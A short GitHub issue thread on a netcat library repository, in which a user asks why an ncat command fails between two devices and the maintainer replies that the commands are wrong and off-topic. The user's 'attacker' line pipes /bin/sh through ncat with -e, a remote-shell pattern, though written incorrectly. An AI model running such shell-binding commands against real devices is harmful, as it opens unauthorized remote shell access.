### ISSUE TITLE
ncat general question probably an easy fix 

### ISSUE THREAD

**Issue by ChillVibesMushroom** [roccomuso/netcat#16]
I noticed if I run an ncat listener and exectue a command using ncat targeting the listener on the same device the command gets exectuted but when I run the same command from two different devices like this :

target
ncat -v -l 8191

attacker 
ncat -v -e /bin/sh `sshd` ip 8191

nothing happens, I just want to be able to execute sshd on my ncat listener without having to use the /bin/bash commands on my android phone that way I can ssh into my device. 

as if it were just an open port running the ncat service any thoughts or tools you can mention that might help?

**Comment by roccomuso** [comment]
your commands are wrong.. Moreover where's the IP address?
are you using the library or you just posted asking about the generic netcat client?
That's not the right place to answer that question.
